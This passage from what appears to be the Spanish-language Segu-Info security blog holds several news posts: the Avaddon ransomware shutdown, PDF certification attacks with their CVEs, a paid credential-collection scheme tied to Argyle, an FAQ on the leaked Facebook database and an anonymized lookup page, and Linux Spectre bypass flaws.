indica que es probable que la operación de ransomware se haya cerrado.
</p>
<p>
Además, las firmas de negociación de ransomware vieron una loca carrera por
parte de Avaddon en los últimos días para finalizar los pagos de rescate de
las víctimas impagas existentes. La demanda de rescate promedio de
Avaddon fue de alrededor de U$S 600k.
</p>
<p>
Sin embargo, en los últimos días, Avaddon ha estado presionando a las víctimas
para que paguen y acepten la última contraoferta sin ningún rechazo, lo que
Siegel afirma que es anormal. No está claro por qué Avaddon cerró, pero probablemente fue causado por el
aumento de la presión y el escrutinio por parte de las fuerzas del orden y los
gobiernos de todo el mundo después de los recientes ataques contra
infraestructuras críticas.</p>
<p>
<i>
"Las acciones recientes de la aplicación de la ley han puesto nerviosos a
algunos actores de amenazas: este es el resultado. Uno menos, y esperemos
que otros también caigan"</i>, dijo Brett Callow, analista de amenazas de Emsisoft.
</p>
<p>
Con los recientes ataques contra Colonial Pipeline y
<a href="https://blog.segu-info.com.ar/search/?q=jbs" target="_blank">JBS</a>,
el ransomware se ha convertido en una prioridad del gobierno de EE.UU. Como se
cree que la mayoría de las operaciones de ransomware más importantes se
realizan en Rusia u otros países de la CEI, el presidente Biden discutirá
estos recientes ataques de ransomware con el presidente ruso Vladimir Putin en
la cumbre de Ginebra del 16 de junio.
</p>
<p>
Fuente:
<a href="https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/" rel="nofollow" target="_blank">BC</a>
</p>
<p></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-754611980784440172021-05-31T16:42:00.001-03:002021-05-31T16:42:31.637-03:00Demuestran vulnerabilidades que permiten modificar PDF certificados<p>
Investigadores de ciberseguridad de <a href="https://web-in-security.blogspot.com/2021/05/attacks-on-pdf-certification.html" rel="nofollow" target="_blank">Ruhr-University Bochum</a>
han revelado dos nuevas técnicas de ataque en documentos PDF certificados que
podrían permitir a un atacante alterar el contenido visible de un documento
mostrando contenido malicioso sobre el contenido certificado sin invalidar su
firma.
</p>
<p>
<i>
"La idea del ataque explota la flexibilidad de la certificación PDF, que
permite firmar o agregar anotaciones a documentos certificados bajo
diferentes niveles de permiso"</i>,
<a href="https://web-in-security.blogspot.com/2021/05/attacks-on-pdf-certification.html" rel="nofollow" target="_blank">dijeron investigadores de Ruhr-University Bochum</a>, que han
<a href="https://thenextweb.com/security/2019/10/02/pdf-flaw-lets-hackers-read-password-protected-documents-researchers-say/" rel="noopener" target="_blank">analizado</a>
<a href="https://thehackernews.com/2021/02/shadow-attacks-let-attackers-replace.html" rel="noopener" target="_blank">asistemáticamente</a>
la seguridad de la especificación PDF a lo largo de los años. Los hallazgos se
presentaron en el 42º Simposio de IEEE sobre Seguridad y Privacidad <a href="https://www.ieee-security.org/TC/SP2021/" rel="noopener" target="_blank">IEEE S&P 2021</a>) celebrado esta semana.
</p>
<p>
Los dos ataques, denominados ataques <a href="https://pdf-insecurity.org/signature/certification.html" rel="nofollow" target="_blank">Evil Annotation y Sneaky Signature</a>, se
basan en manipular el proceso de certificación de PDF mediante la explotación
de fallas en la especificación que rige la implementación de firmas digitales
(también conocida como firma de aprobación) y su variante más flexible llamada
firmas de certificación.
</p>
<p>
Las firmas de certificación también permiten diferentes subconjuntos de
modificaciones en el documento PDF según el nivel de permiso establecido por
el certificador, incluida la capacidad de escribir texto en campos de
formulario específicos, proporcionar anotaciones o incluso agregar varias
firmas.
</p>
<p><i>
Evil Annotation Attack (EAA)</i> funciona modificando un documento certificado que
está provisto para insertar anotaciones para incluir una anotación que
contiene código malicioso, que luego se envía a la víctima. Por otro lado, la
idea detrás del ataque <i>Sneaky Signature (SSA)</i> es manipular la apariencia
agregando elementos de firma superpuestos a un documento que permite completar
campos de formulario.
</p><div class="separator" style="clear: both; text-align: center;"><img border="0" data-original-height="609" data-original-width="728" height="535" src="https://thehackernews.com/images/-XI939fibAlc/YLH6tRFXbXI/AAAAAAAACrs/F682v-ANSZg5_ZTzYhINC7JWsp_hXCPmQCLcBGAsYHQ/s0/pdf.jpg" width="640" /></div>
<p><i>
"Al insertar un campo de firma, el firmante puede definir la posición exacta
del campo y, además, su apariencia y contenido, dijeron los investigadores"</i> . Esta flexibilidad es necesaria ya que cada nueva firma podría contener la
información del firmante. La información puede ser un gráfico, un texto o una
combinación de ambos. Sin embargo, el atacante puede hacer un mal uso de la
flexibilidad para manipular sigilosamente el documento e insertar contenido
nuevo.
</p>
<p>
En un escenario de ataque hipotético detallado por los académicos, un
certificador crea un contrato certificado con información confidencial
mientras habilita la opción de agregar más firmas al contrato PDF.
Aprovechando estos permisos, un atacante puede modificar el contenido del
documento, por ejemplo, para mostrar un Número de Cuenta Bancaria
Internacional (IBAN) bajo su control y transferir fondos de manera
fraudulenta, ya que la víctima, incapaz de detectar la manipulación, acepta la
manipulación. contrato.
</p>
<p>
15 de las 26 aplicaciones PDF evaluadas por los investigadores, contando Adobe
Acrobat Reader (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-28545" rel="nofollow" target="_blank">CVE-2021-28545</a> y <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-28546" rel="nofollow" target="_blank">CVE-2021-28546</a>), Foxit Reader
(<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35931" rel="nofollow" target="_blank">CVE-2020-35931</a>) y Nitro Pro, se encontraron vulnerables al ataque EAA.
permitir que un atacante cambie el contenido visible en el documento. Soda PDF
Desktop, PDF Architect y otras seis aplicaciones fueron identificadas como
susceptibles a ataques SSA.
</p><div class="separator" style="clear: both; text-align: center;"><img border="0" data-original-height="518" data-original-width="728" height="455" src="https://thehackernews.com/images/-649dfyPYuIQ/YLH6aK9xw1I/AAAAAAAACrk/Xzd9sALjIm4dVZ3QDGW-sCf5lx7jjCGoACLcBGAsYHQ/s0/pdf-security.jpg" width="640" /></div>
<p>
Más preocupante aún, el estudio reveló que es posible ejecutar código
JavaScript con muchos privilegios, por ejemplo, redirigir al usuario a un
sitio web malicioso, en Adobe Acrobat Pro y Reader, escabulléndose dicho
código a través de EAA y SSA como una actualización incremental del documento
certificado. Adobe abordó la debilidad (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-24432" rel="nofollow" target="_blank">CVE-2020-24432</a>) como parte de su
actualización del martes de <a href="https://helpx.adobe.com/security/products/acrobat/apsb20-67.html" rel="nofollow" target="_blank">parches para noviembre de 2020</a>.
</p>
<p>
Para defenderse de tales ataques, los investigadores recomiendan prohibir las
anotaciones de FreeText, Stamp y Redact, así como asegurarse de que los campos
de firma se configuren en ubicaciones definidas en el documento PDF antes de
la certificación, además de penalizar cualquier adición posterior de campos de
firma con una certificación no válida. Los investigadores también han
creado una utilidad basada en Python llamada P<a href="https://pdf-demos.de/pdf-detector" rel="nofollow" target="_blank">DF-Detector</a>, que analiza
documentos certificados para resaltar cualquier elemento sospechoso que se
encuentre en el documento PDF.
</p>
<p><i>
"Aunque ni la EAA ni la SSA pueden cambiar el contenido en sí, siempre
permanece en el PDF, las anotaciones y los campos de firma se pueden usar como
una superposición para agregar contenido nuevo. Las víctimas que abren el PDF no pueden distinguir estas adiciones del
contenido normal. Y lo que es peor: las anotaciones pueden incrustar código
JavaScript de alto privilegio que puede agregarse a ciertos documentos
certificados"</i>.
</p><p>Fuente: <a href="https://thehackernews.com/2021/05/researchers-demonstrate-2-new-hacks-to.html" rel="nofollow" target="_blank">THN</a></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-49091463857498219422021-05-27T09:08:00.003-03:002021-05-27T10:16:27.242-03:00"Entrega tus datos personales y credenciales por U$S 500"<p>
A principios de este año, trabajadores de EE.UU. recibieron un correo
electrónico tentador de una organización llamada Workplace Unite. En el mismo
se leía:
</p>
<blockquote>
Proporciónenos sus credenciales de inicio de sesión de su lugar de trabajo y
le pagaremos U$S 500. No solo eso, Workplace Unite también seguirá pagando U$S
25 por mes siempre que las credenciales de inicio de sesión sigan funcionando.
</blockquote>
<p>
Otras marcas y sitios web con nombres similares a "Workers Unite" ofrecieron
un pago único de U$S100.
</p>
<blockquote>
<i>"Workplace Unite tiene como objetivo maximizar el valor personal de los
datos de cada trabajador. Estamos buscando personas que trabajen (o
solían trabajar) en varias empresas para que se unan a nuestro programa beta
pagado y compartan su experiencia laboral con nosotros. Este intercambio de
conocimientos nos ayudará a crear una nueva herramienta que pondrá a cada
trabajador a cargo de sus propios datos personales".</i>
</blockquote>
<p>
Algunos de los sitios dijeron que las personas que proporcionan sus
credenciales de su cuenta de trabajo les permitirían ver cuánto ganan en
comparación con sus pares. Pero este acceso también permite que quien esté
recolectando todas estas credenciales obtenga ese tipo de visibilidad a
escala, potencialmente monitoreando los salarios o el pago de diferentes roles
en varias industrias.
</p>
<blockquote><i>
"Al participar en el Programa, acepta proporcionarnos sus credenciales, para
que podamos acceder a su/s cuenta/s de trabajo con el fin de ejecutar
pruebas de compatibilidad para mejorar. A cambio, le pagaremos de acuerdo con estos Términos".
</i></blockquote>
<p>
<b>Detrás del lindo marketing aparece un potencial problema de seguridad y
legal.</b>
Un empleado que brinde acceso a la infraestructura de su empleador actual o
anterior sin autorización podría infringir las leyes. Pero curiosamente, esos
correos electrónicos y sitios que ofrecen pagos por los detalles de inicio de
sesión están claramente vinculados a una startup llamada Argyle que
recientemente recaudó U$S 20 millones en fondos,
<a href="https://handbook.wonder.me/Argyle-A-Round-Funding-Memo-Public-Version-597e168c519c4cd7b40bd5ff1acb1083" rel="nofollow" target="_blank">según un análisis de los investigadores de seguridad y Motherboard</a>.
</p><div class="separator" style="clear: both; text-align: center;"><img border="0" data-original-height="600" data-original-width="800" div="" height="480" src="https://urlscan.io/screenshots/44be496a-252c-47b8-a723-eae35e23e811.png" width="640" />
</div>
<p>
Motherboard verificó que múltiples ejemplos de dominios sospechosos como
Workers Unite que ofrecen pagos, mencionan a Argyle, lo que indica una
conexión entre las páginas y la propia Argyle. Esta empresa un corredor de
datos con sede en la ciudad de Nueva York, afirma brindar a los clientes
información valiosa al actuar como una
<i>"puerta de entrada para acceder a los registros de empleo"</i>, y dice que
tiene unos 40 millones de registros. El memorando de financiación público
Argyle dice que la empresa
<i>"mantiene datos en vivo de los sistemas que estos empleadores usan para
administrar los registros de empleo, y proporciona un conjunto de datos
normalizados para que las empresas puedan hacer uso de los mismos de una
manera simple pero impactante"</i>. En resumen, Argyle recopila el historial de empleo, y luego brinda acceso a
eso a los clientes.
</p>
<p></p>
<p>
Las preguntas sobre de dónde provenían al menos algunos de esos datos
comenzaron en marzo, cuando el investigador de seguridad
<a href="https://twitter.com/GossiTheDog/status/1377262935186284546" rel="nofollow" target="_blank">Kevin Beaumont tuiteó capturas de pantalla</a>
de lo que dijo que era una
<i>"parte realmente loca de phishing dirigido a empresas en todo Estados
Unidos"</i>.
</p><p>Algunos de los sitios también mencionan empresas específicas como J.P. Morgan Chase, T-Mobile, la firma de seguros The Hartford y Amazon. Motherboard encontró que muchos de los dominios tienen páginas de Facebook correspondientes, a veces con miles de me gusta.</p><p></p><p>Después de que Beaumont y otros tuitearon sobre los sitios que ofrecían pagos, se desconectaron.</p>
<p><a href="https://twitter.com/BushidoToken/status/1377565483373826050" target="_blank">Otros investigadores </a> <a href="https://twitter.com/martijn_grooten/status/1377576825229086723" target="_blank">encontraron dominios similares</a>. William Thomas,
investigador de seguridad de la firma de inteligencia de amenazas Cyjax,
tuiteó algunos de sus hallazgos en ese momento y, más recientemente,
proporcionó a Motherboard un <a href="https://urlscan.io/result/e5f92b92-7b3f-40b0-8182-55d76a2faadd/related/" rel="nofollow" target="_blank">listado con los dominios que descubrió</a>.</p><p><b>En términos generales, los empleados no tienen autorización general para
compartir o hacer lo que deseen con sus credenciales de inicio de sesión
corporativas, ya sea para trabajos pasados o actuales.</b> </p><p>En 2013, el
periodista Matthew Keys fue acusado de proporcionar a miembros de Anonymous
credenciales de inicio de sesión para Tribune Company. Los atacantes luego usaron esas credenciales para atacar el sitio web de
Los Angeles Times. <a href="https://www.wired.com/2016/04/journalist-matthew-keys-sentenced-two-years-aiding-anonymous/" rel="nofollow" target="_blank">Keys fue condenado a dos años de prisión</a>. En otro caso,
Christopher Correa, un ex ejecutivo del equipo de béisbol Cardinals, <a href="https://www.nytimes.com/2016/07/19/sports/baseball/christopher-correa-a-former-cardinals-executive-sentenced-to-four-years-for-hacking-astros-database.html" rel="nofollow" target="_blank">fue sentenciado a cuatro años de prisión</a> por ingresar al sistema de los Cardinals
usando una contraseña de su ex empleador.
</p><p>Fuente: <a href="https://www.vice.com/en/article/7kvvbb/argyle-payroll-login-phishing" rel="nofollow" target="_blank">Vice</a></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-65923677331190333032021-04-05T13:53:00.013-03:002021-04-07T10:04:53.076-03:00Reflexiones personales y FAQ sobre los datos expuestos de #Facebook<p>
Las historias de las filtraciones de datos de Facebook ya no deberían ser
noticia, deberían ser un recordatorio diario de que subir datos personales a
las redes sociales y a la nube en general no es una buena idea.
</p>
<p>
El último suceso de este tipo hecho público, fue a
<a href="https://www.forbes.com/sites/zakdoffman/2019/09/12/new-instagram-hack-exclusive-facebook-confirms-user-accounts-and-phone-numbers-at-risk/?sh=6f6e2fa52200" target="_blank">finales de 2019</a>, cuando se supo que millones de registros de Facebook, Instagram y Whatsapp
habían sido obtenidos de diversas maneras por atacantes y que los mismos se
encontraban a la venta en distintos foros de hacking y canales de
Telegram. <a href="https://gist.github.com/troyhunt/9a081cea0de6cbc63d93ebc010484eda" rel="nofollow" target="_blank">Aquí</a> hay un ejemplo del formato de dichos archivos.</p>
<p>
Como menciono
<a href="https://blog.segu-info.com.ar/2021/04/533m-usuarios-de-facebook-publicos-en.html" rel="nofollow" target="_blank">aquí</a>, la filtración era conocida por algunos "pocos" pero, a partir del sábado
pasado dicha base de datos con
<a href="https://blog.segu-info.com.ar/2021/04/533m-usuarios-de-facebook-publicos-en.html" rel="nofollow" target="_blank">533 millones de registros</a> (en realidad <a href="https://www.troyhunt.com/the-facebook-phone-numbers-are-now-searchable-in-have-i-been-pwned/" rel="nofollow" target="_blank">fueron 509.458.528 cuentas</a>, <a href="https://haveibeenpwned.com/PwnedWebsites#Facebook" rel="nofollow" target="_blank">el 20% del total de cuentas</a>) se hizo pública en Internet y <b>cualquiera</b> la puede bajar desde distintas
URL, canales de chat, medios para compartir archivos, etc.</p>
<p>Dicha base de datos tiene el siguiente formato:</p>
<p></p>
<ul style="text-align: left;">
<li>Número de teléfono móvil</li>
<li>ID interno de FB</li>
<li>Nombre</li>
<li>Apellido</li><li>Correo electrónico</li>
<li>Sexo</li>
<li>Actividad laboral</li>
<li>Relación sentimental</li>
<li>Ubicación</li>
<li>Fecha de último login</li>
</ul>
<p>
En Internet se consiguen varias versiones de las filtraciones, las cuales son
diferentes, no están relacionadas entre sí y parecen haber sido obtenidos por
diferentes personas en diferentes momentos. Los datos se podrían haber
conseguido mediante <i>scrapping</i> o, en el caso del número móvil, a través
de la configuración incorrecta de seguridad, cuando un usuario decide
compartirlo y no tiene marcado "solo yo" en la visualización de su perfil.
</p>
<p>
A partir de dicha filtración decidí crear una simple página de consulta (<a href="https://www.segu-info.com.ar/ip/facebook" rel="nofollow" target="_blank">esta</a>), a partir de los archivos públicos que están disponibles en Telegram, Mega,
Pastebin, Torrent, y cientos de otros repositorios.
<b>Dicha página elimina los datos personales completamente, anonimiza el
teléfono móvil y no brinda ningún tipo de información sobre el mismo.</b>
Se pueden consultar los siguientes países de América Latina:
</p>
<ul style="text-align: left;">
<li>AR 2.339.555 registros</li>
<li>BO 2.969.209 registros</li>
<li>CL 6.889.081 registros</li>
<li>CO 12.735.073 registros</li>
<li>EC 318.824 registros</li>
<li>GT 1.645.068 registros</li>
<li>MX 1.333.0561 registros</li>
<li>PE 8.075.316 registros</li>
<li>UY 1.509.317 registros</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="133" data-original-width="800" src="https://therecord.media/wp-content/uploads/2021/04/Facebook-DB-sample.png" />
</div>
<br />
<div>
El uso es muy sencillo, ingresas tu número de móvil y te informa si el mismo
está o no en la base de datos filtrada. Simplemente se informa por "SI" o
"NO", no se brinda ningún otro dato, porque, como expliqué anteriormente, los
mismos se han eliminado.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.segu-info.com.ar/ip/facebook" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="576" data-original-width="800" height="461" src="https://i.imgur.com/V34D7sc.png" width="640" /></a>
</div>
<br />
<div>
A partir de dicha publicación recibí cientos de comentarios constructivos,
positivos y negativos. A los positivos, GRACIAS; a los negativos, ignorarlos
y, para las criticas constructivas, he creado esta FAQ con los distintos
aspectos que surgen de la publicación.
</div>
<h4>¿Los datos son públicos?</h4>
<p>
No, pero sí. Los datos han sido recolectados desde Facebook por alguien
desconocido y han circulado de forma "abierta" por Internet al menos durante
un año; antes se encontraban a la venta pero ahora pueden ser accedidos
libremente en archivos ZIP.
</p>
<p>
Aquí vale la pena remarcar que "abierto" no implica que sean datos
públicos (no lo eran cuando los subiste a la red social). En este caso están
"abiertos" por motivos ajenos a la voluntad del dueño de datos; están abiertos
porque (ahora) no existen medidas técnica que impidan el acceso a los mismos.
Este es un concepto muy utilizado cuando se habla de
<a href="https://es.wikipedia.org/wiki/Inteligencia_de_fuentes_abiertas" rel="nofollow" target="_blank">OSINT (Open Source Intelligence)</a>.
</p>
<h4 style="text-align: left;">¿Quién compiló y/o publico los archivos?</h4>
<p>No lo sé.</p>
<h4>¿Los datos solo involucran a FB o a Instagram y Whataspp también?</h4>
<p>
Son la misma empresa, involucran a todo lo que tengan registrado de un
usuario, en cualquiera de sus servicios. Los datos son los mencionados arriba
y cientos de otros marcadores que las redes sociales recolectan
continuamente.
</p>
<h4>Que las redes sociales hagan eso, ¿es legal?</h4>
<p>
Sí, desde el momento en que aceptaste (<strike>sin leer</strike>) las
Políticas de Privacidad de esas empresas.
</p>
<h4>¿Por qué aparecen mis datos?</h4>
<p>
Porque en algún momento Facebook o tú han configurado incorrectamente el
perfil de la red social y esto permitió que los datos pudieran ser
recolectados de forma manual o automática por alguien con más o menos
conocimiento técnico.
</p>
<p>
Es decir, Facebook no cumple (nunca lo ha hecho) el principio de
<a href="https://dpd.aec.es/privacidad-por-defecto-y-desde-el-diseno-en-el-reglamento-europeo-de-proteccion-de-datos/" rel="nofollow" target="_blank">Privacidad por Defecto y desde el Diseño</a> muy conocido en Seguridad de la Información e impulsado por el
<a href="https://blog.segu-info.com.ar/search/?q=RGPD" rel="nofollow" target="_blank">RGPD</a> de Europa. Este principio dice que los datos deben ser protegidos
por defecto (desde el momento del diseño del sistema), al margen de las
decisiones y uso del usuario. Como Facebook no cumple este y otros principios,
descarga la responsabilidad en el usuario. Las consecuencias son que tus datos
fueron (y son) extraídos desde la red social por falta de protección y mala
configuración.
</p>
<h4>
Si ya borre mi perfil de FB o mi número, ¿por qué mis datos aún figuran?
</h4>
<p>
Porque, cuando se recolectan los datos, todos pasan a engrosar un archivo
general de información. No importa si luego borras esa información, el
delincuente ya los tiene.
<b>Recuerda: lo que sube a Internet, NUNCA más baja. </b>
</p>
<h4>¿Puedo conseguir la base de datos y verificar si aparezco?</h4>
<p>
Sí, te descargas el archivo de cada país y te buscas manualmente. Los archivos
tienen varios Megabyte de solo texto. Para alguien técnico implica un trabajo
sencillo de un par de minutos. Para un usuario novato podría significar un
problema.
</p>
<h4>Soy un usuario novato, ¿necesito de esta página?</h4>
<div>
No, pero es más fácil (y probablemente más seguro) buscarlo de esta manera que
buscar los archivos. Ese es el objetivo que perseguimos, ayudar al usuario
novato y concientizar en el proceso.
</div>
<div>
<h4>Soy un experto, ¿necesito de esta página?</h4>
<div>No, si deseas puedes buscar los archivos por tí mismo.</div>
</div>
<h4 style="text-align: left;">
OK, puedo consultar mi propio número, ¿y el de otra persona?
</h4>
<p>
Puedes consultar un número cualquiera pero no los datos de la persona a quien
pertenece ese número porque, los hemos eliminado.
</p>
<h4>Entonces, ¿puedo hacer una consulta masiva a la base de datos?</h4>
<p>
No, no deberías, la consulta es individual. Pero, si eres más técnico, puedes
intentar crear un bot; en la mayoría de los casos serás bloqueado por el
CAPTCHA que aparece en la página. Y, si eres experto puedes hacerlo, pero
sería más fácil y barato buscar los archivos en Internet.
</p>
<h4>¿Cómo se que los archivos descargados son los correctos?</h4>
<div>
No lo sabes, hay cientos de archivos peligrosos o malware que los delincuentes
utilizan para infectarte y que harán pasar por los archivos reales. De nuevo,
si eres experto no necesitas de esta página, buscarás los archivos por tí
mismo.
</div>
<h4>¿Segu-Info va a publicar los archivos?</h4>
<p>
<b> No, nunca.</b> Eso favorece y facilita el trabajo de otros delincuentes
que usarán los datos personales para realizar robos, estafas, fraudes y para
infectarte.
</p>
<h4>Y, Segu-Info ¿por qué los tiene?</h4>
<p>
Porque fueron publicados en fuentes abiertas y se encuentran disponibles en
cientos de sitios en Internet (como explico arriba).
</p>
<h4>¿Tienes permiso para tener esos datos?</h4>
<p>
No, nadie los tiene, pero la pregunta es incorrecta, es la filosofía de "matar
al mensajero". La pregunta correcta sería ¿por qué Facebook no protege
adecuadamente la información que tú le confiaste? o en última instancia ¿por
qué entregaste dichos datos? o, ¿por qué circularon en Internet durante un año
y ahora, que la fuga se hizo pública de forma masiva, me reclamas a mí?
</p>
<h4>Pero, ¿Tienes permiso para tener, manipular y mostrar esos datos?</h4>
<p>
No, nadie los tiene. Por eso hemos anonimizado dichos datos, esto es: eliminar
la información personal (como nombre, apellido, sexo, ubicación, etc.). y
dejar sólo parte del número de móvil, sin identificar a quien pertenece.
</p>
<h4>Pero, hacer eso ¿es legal?</h4>
<p>
Los distintos países tienen Ley de Protección de Datos Personales en donde se
define qué es un Dato Personal. Por ejemplo, en Argentina la
<a href="http://servicios.infoleg.gob.ar/infolegInternet/anexos/60000-64999/64790/texact.htm" rel="nofollow" target="_blank">Ley 25.326</a>
dice en su artículo 2:
</p>
<blockquote>
— Datos personales: Información de cualquier tipo referida a personas físicas
o de existencia ideal determinadas o determinables.<br /><br />— Datos
sensibles: Datos personales que revelan origen racial y étnico, opiniones
políticas, convicciones religiosas, filosóficas o morales, afiliación sindical
e información referente a la salud o a la vida sexual.
</blockquote>
<p>
Por eso, para evitar tener tus datos personales, hemos eliminado la
información personal que te identifica unívocamente como
<i>"personas físicas o de existencia ideal determinadas o determinables".</i>
</p>
<h4>Pero, ¿eso es éticamente correcto?</h4>
<p>
La ética es mi principal preocupación aquí. Si te ayudo a saber si tu número
está en un listado ¿qué sería lo incorrecto? De nuevo, si no confías o tienes
dudas, no utilices la página, es tú derecho.
</p>
<p>
Y, te pregunto, ¿es ético o correcto publicar un enlace con <u>todos</u> los
533 millones de datos sin anonimizar?
</p>
<h4 style="text-align: left;">¿Es seguro usar esa página web?</h4>
<div>
Si entras, es bajo tu propia responsabilidad, como todo lo que haces en la
vida y en Internet. Eres dueño de ingresar y confiar, o no. Nosotros hemos
hecho lo mejor posible para no violar tu intimidad y proteger tus datos.
Piensa en eso la próxima vez que entregues tus Datos Personales a una empresa
cualquiera.
</div>
<h4>Pero, si pongo mi número de teléfono ¿me dice si estoy en la BD?</h4>
<p>Sí, te informo "Tu número está o no". Nada más.</p>
<h4>Pero entonces ¿sabes quien soy?</h4>
<p>
No, tu eres un anónimo que ingresa al sitio y tu número de móvil no significa
nada para nosotros. Ya no hay registro ni relación entre el número de móvil y
la persona, porque los hemos eliminado.
</p>
<h4>Entonces ¿qué guardas si entro al sitio?</h4>
<p>
Nada, pero eres dueño de creerme o no, eres dueño de no usar el sitio, eres
dueño de tus datos, pero parece que eso no te importó cuando se los regalaste
a Facebook.
</p>
<p>
Nuestra página web ni siquiera cuenta la cantidad de visitas, no tiene
publicidad ni <i>ads</i>, no guarda tu dirección IP, ni los números
telefónicos consultados, no se utiliza ningún de software de base de datos,
solo se utilizan archivos de texto plano originales previamente anonimizados.
</p>
<p>
Pero, de nuevo, eres dueño de creerme o no. Como dice al pie de la página,
sería bueno que te hicieras las mismas preguntas cuando te registras en
servicios "gratuitos" en Internet.
</p>
<h4 style="text-align: left;">Quiero que borres mi número ¿Puedes hacerlo?</h4>
<p>
Sí,
<a href="https://www.segu-info.com.ar/contacto" target="_blank">escríbenos</a>
y lo haremos. Eliminaremos de nuestro archivo anonimizado tu número, pero
seguirá estando en los cientos de lugares donde ya se publicaron los archivos.
</p>
<h4>¿Por qué o para qué lo haces?</h4>
<p>
Porque creo en concientizar a las personas y esta es una buena oportunidad
para que todos aprendamos a administrar nuestros Datos Personales; explicar
porqué Internet y las redes sociales son una herramienta invaluable, pero que
no significa que debamos regarles nuestra vida,
<b>son empresas privadas y para ellos nuestros datos sí tienen precio.</b>
Creo en ayudar desinteresadamente y entiendo la desconfianza, -que es adecuada
y la comparto, porque también soy un paranoico- y, por eso también entiendo
las preguntas anteriores y muchas otras.
</p>
<h4>Pero entonces, ¿qué ganas con esto?</h4>
<p>
Nada, son horas <strike>perdidas</strike> de desarrollo (durante un domingo de
Pascuas), compilación de datos, anominización, publicación del sitio web,
desarrollar esta FAQ, discutir con la gente que detrás de todo ve un interés
personal o comercial. Son esas mismas personas que critican las que luego
publican los enlaces con la base de datos completa para que te busques, porque
es más confiable que hacerlo en un sitio "anónimo".
</p>
<h4 style="text-align: left;">¿Vas a eliminar la información?</h4>
<p>Sí, luego de los 10 días la página y los archivos serán eliminados.</p>
<h4 style="text-align: left;">Ahora, en serio ¿qué ganas?</h4>
<p>Si llegaste hasta aquí, he ganado.</p>
<h4 style="text-align: left;">
¿Deseas sumar una pregunta? Déjala en los comentarios.
</h4>
<p></p>
<div style="text-align: right;">
<b>Lic. Cristian Borghello, CISSP - CCSK - CSFPC</b>
</div>
<b><div style="text-align: right;">
<b>Director Segu-Info - Segu-Kids - Antiphishing - ODILA</b>
</div></b>
<p></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com10tag:blogger.com,1999:blog-14423462.post-2735765601658912082021-03-31T18:00:00.001-03:002021-03-31T18:48:26.411-03:00Dos nuevas vulnerabilidades permiten explotar Spectre en Linux<div class="separator"><div class="separator" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" data-original-height="450" data-original-width="800" height="225" src="https://blog.malwarebytes.com/wp-content/uploads/2018/01/banner-900x506.png" width="400" /></div></div><p>
Dos nuevas vulnerabilidades recientemente descubiertas podrían permitir eludir las
mitigaciones que permitían evitar los ataques
<a href="https://blog.segu-info.com.ar/search/?q=Spectre" rel="nofollow" target="_blank">Spectre</a>
en Linux. Los errores podrían permitir que un usuario malintencionado acceda
datos que pertenecen a otros usuarios.
</p><p>Las vulnerabilidades <b>afectan a todos los kernel de Linux inferiores a 5.11.8</b> y fueron descubiertas por Piotr Krysiuk, un
investigador del equipo
<a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/spectre-bypass-linux-vulnerabilities" rel="nofollow" target="_blank">Threat Hunter de Symantec</a>, quien las informó al equipo de seguridad del kernel de Linux. Si no se
actualiza, significaría que las protecciones de Spectre existentes no serían
suficientes para evitar algunas de las técnicas de explotación existentes.</p>
<p>Las vulnerabilidades en cuestión son:</p>
<p></p>
<ul style="text-align: left;">
<li>
<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-27170" rel="nofollow" target="_blank">CVE-2020-27170</a>: puede revelar contenido de toda la memoria de una computadora afectada
</li>
<li>
<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-27171" rel="nofollow" target="_blank">CVE-2020-27171</a>: puede revelar contenido de un rango de memoria del kernel de 4 GB
</li>
</ul>
<p></p>
<p>
Estos errores serían particularmente
impactantes en los recursos compartidos, ya que permitirían a un usuario
malintencionado acceder a datos que pertenecen a otros usuarios.
</p>
<p><b>
Los parches para estos errores se publicaron por primera vez el 17 de marzo de
2021 y se incluyen con los kernels de Linux lanzados el 20 de marzo.
</b></p>
<h3 style="text-align: left;">¿Qué son Meltdown y Spectre?</h3>
<p>
<a href="https://blog.segu-info.com.ar/search/?q=meltdown" target="_blank">Meltdown</a> y <a href="https://blog.segu-info.com.ar/search/?q=Spectre" target="_blank">Spectre</a>
fueron dos vulnerabilidades de chip descubiertas en enero de 2018 que
afectaron a casi todos los procesadores modernos y solo pudieron mitigarse
mediante parches del sistema operativo. Una explotación exitosa de las
vulnerabilidades podría permitir a los atacantes obtener acceso no autorizado
a la memoria de una computadora, incluida información confidencial, como
contraseñas. Sin embargo, las vulnerabilidades solo eran explotables si el
atacante ya tenía acceso a las máquinas, si era un usuario local o había
obtenido acceso con un paso adicional, como implementar un troyano de acceso
remoto (RAT) en la máquina.
</p>
<p>
Spectre aprovechó las fallas en los diseños de procesadores para revelar
contenidos de la memoria que normalmente no deberían ser accesibles. Funciona
al observar los efectos secundarios que deja la ejecución especulativa, como
cuando un procesador predice incorrectamente los resultados de las
verificaciones de límites. Las variantes de Spectre afectan prácticamente a
todos los procesadores modernos, incluidos los chips de Intel, ARM y AMD.
</p>
<p>
Meltdown aprovechó diferentes fallas en los procesadores para evitar el
aislamiento de la memoria en el sistema operativo. Los sistemas operativos
están diseñados de manera que impiden que una aplicación acceda a la memoria
utilizada por otra. Si el aislamiento de la memoria no funciona, una
aplicación malintencionada podría robar información de la memoria que utilizan
otras aplicaciones o usuarios.
</p>
<p>
Debido a que son vulnerabilidades de chip, los parches del sistema operativo
eran esencialmente mitigaciones diseñadas para hacer imposible que un atacante
explotara las vulnerabilidades, en lugar de abordar el problema subyacente.
</p>
<p>
Son las mitigaciones para Spectre las que se pueden omitir en Linux utilizando
las vulnerabilidades
